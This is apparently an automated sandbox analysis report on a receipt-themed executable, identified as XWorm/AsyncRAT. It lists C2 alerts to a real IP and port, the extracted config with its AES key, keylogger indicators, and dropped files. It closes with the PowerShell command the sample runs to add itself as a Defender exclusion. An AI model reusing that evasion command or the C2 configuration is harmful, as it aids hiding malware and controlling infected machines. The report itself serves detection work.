2024-12-24T11:29:38.052245+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:48.738135+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:54.512232+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:29:55.332454+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:04.077044+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:06.175853+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:10.299985+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:10.495047+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:15.440562+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:15.644058+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:15.878620+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:28.701122+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:31.706258+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:31.964910+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:32.158493+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:32.280984+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:36.790933+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:37.443240+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:37.643551+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:37.763343+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:37.882998+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:38.737479+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:42.224585+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:42.909048+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:52.129017+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:53.348716+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:53.549068+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:54.162909+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:58.643299+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:31:06.582926+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:31:10.563870+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP


            AV Detection

Source: Recaipt202431029.exe; Avira: detected
Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe; Avira: detection malicious, Label: HEUR/AGEN.1306877
Source: C:\Users\user\AppData\Roaming\Notepab .exe; Avira: detection malicious, Label: HEUR/AGEN.1306877
Source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Xworm {"C2 url": ["172.245.244.69"], "Port": 5200, "Aes key": "1987", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe; ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Roaming\Notepab .exe; ReversingLabs: Detection: 68%
Source: Recaipt202431029.exe; ReversingLabs: Detection: 68%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Notepab .exe; Joe Sandbox ML: detected
Source: Recaipt202431029.exe; Joe Sandbox ML: detected
Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: 172.245.244.69
Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: 5200
Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: 1987
Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: <Xwormmm>
Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: BEHROOZ
Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: USB.exe
Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: %AppData%
Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String decryptor: Notepab .exe
Source: Recaipt202431029.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Recaipt202431029.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: UQzc.pdbSHA256T source: Recaipt202431029.exe, JvkAPBBIe.exe.0.dr, Notepab .exe.9.dr
            Source: Binary string: UQzc.pdb source: Recaipt202431029.exe, JvkAPBBIe.exe.0.dr, Notepab .exe.9.dr

            Networking

            Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 172.245.244.69:5200 -> 192.168.2.5:49710
            Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49710 -> 172.245.244.69:5200
            Source: Malware configuration extractor | URLs: 172.245.244.69
            Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: unknown | TCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: Recaipt202431029.exe, 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Recaipt202431029.exe, 00000009.00000002.4558767346.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, JvkAPBBIe.exe, 0000000A.00000002.2181051292.0000000003102000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Window created: window name: CLIPBRDWNDCLASS

            System Summary

            Source: 0.2.Recaipt202431029.exe.3630650.3.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Recaipt202431029.exe.3630650.3.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Recaipt202431029.exe.3652e70.1.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Recaipt202431029.exe.3652e70.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 14.2.JvkAPBBIe.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 14.2.JvkAPBBIe.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Process Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_00B63E28
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_00B6E22C
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_00B67019
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_0686DF29
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06866B60
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06884690
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06888C78
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_068858C0
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06885058
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06882948
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06881578
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06C70710
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06C70E78
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06C78410
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06C75E48
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06C71AD8
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06D1A450
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06D1C518
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06D1C508
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06D1C0D3
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06D1C0E0
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06D1A013
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_06D1A888
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_0850885D
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_0850F698
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_08505FD8
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_08509078
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 0_2_08509069
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_01634538
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_01631360
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_01633880
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_01633F40
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_01631A0A
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_0563E118
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_056373D0
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_0563D2D8
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_05637FD0
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_0563F9A8
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_0563DAF0
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_05635D6F
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_05635D80
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_05632A90
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_0643AE18
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_06439FD0
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_06435FF8
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_06435728
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_06431488
            Source: C:\Users\user\Desktop\Recaipt202431029.exe | Code function: 9_2_064353E0
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_00E43E28
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_00E4E22C
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_00E47019
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_057E8C78
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_057E1578
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_057E4690
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_057E5058
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_057E2948
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_06EB0710
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_06EB0E78
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_06EB5E48
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_0705C508
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_0705C518
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_0705A450
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_0705A018
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_0705C0D3
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_0705C0E0
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_07055870
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_0705A879
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_0705A888
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_07080040
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 10_2_07080007
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe | Code function: 14_2_012B1360
            Source: Recaipt202431029.exe, 00000000.00000002.2121849231.00000000008CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2126732954.0000000003581000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMrchrisXW.exe4 vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2146647046.00000000088A0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMrchrisXW.exe4 vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000000.2091044216.0000000000212000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameUQzc.exeZ vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2145704127.000000000848E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUQzc.exeZ vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2145095936.0000000006CD0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000009.00000002.4566923210.0000000005E89000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000009.00000002.4563447975.00000000040A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUQzc.exeZ vs Recaipt202431029.exe
            Source: Recaipt202431029.exe | Binary or memory string: OriginalFilenameUQzc.exeZ vs Recaipt202431029.exe
            Source: Recaipt202431029.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.Recaipt202431029.exe.3630650.3.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Recaipt202431029.exe.3630650.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Recaipt202431029.exe.3652e70.1.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Recaipt202431029.exe.3652e70.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 14.2.JvkAPBBIe.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 14.2.JvkAPBBIe.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Recaipt202431029.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: JvkAPBBIe.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Notepab .exe.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Settings.cs | Base64 encoded string: 'y7z7NxMhV6ZsUmY0YLoertFerJJBTb3uF6DEd276QIY8AvEctNsnVw0DB0Scwmym', 'Ymzft32Czvgz/vIi+ZJ4Snux84H4lGCOkdnylPSwDRUstjjUxn94CPNWLSt0c94g'
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Settings.cs | Base64 encoded string: 'y7z7NxMhV6ZsUmY0YLoertFerJJBTb3uF6DEd276QIY8AvEctNsnVw0DB0Scwmym', 'Ymzft32Czvgz/vIi+ZJ4Snux84H4lGCOkdnylPSwDRUstjjUxn94CPNWLSt0c94g'
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, WmJXSxm2fenOX5jabt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, WG61eoLfq8l6bLFQSu.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, WG61eoLfq8l6bLFQSu.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, WG61eoLfq8l6bLFQSu.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, WG61eoLfq8l6bLFQSu.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, WG61eoLfq8l6bLFQSu.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, WG61eoLfq8l6bLFQSu.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, WmJXSxm2fenOX5jabt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@19/18@0/1
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile created: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
            Source: C:\Users\user\Desktop\Recaipt202431029.exeMutant created: \Sessions\1\BaseNamedObjects\wLgC73MktegsYOI5
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile created: C:\Users\user\AppData\Local\Temp\tmp912F.tmpJump to behavior
            Source: Recaipt202431029.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Recaipt202431029.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Recaipt202431029.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile read: C:\Users\user\Desktop\Recaipt202431029.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Recaipt202431029.exe "C:\Users\user\Desktop\Recaipt202431029.exe"
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe"
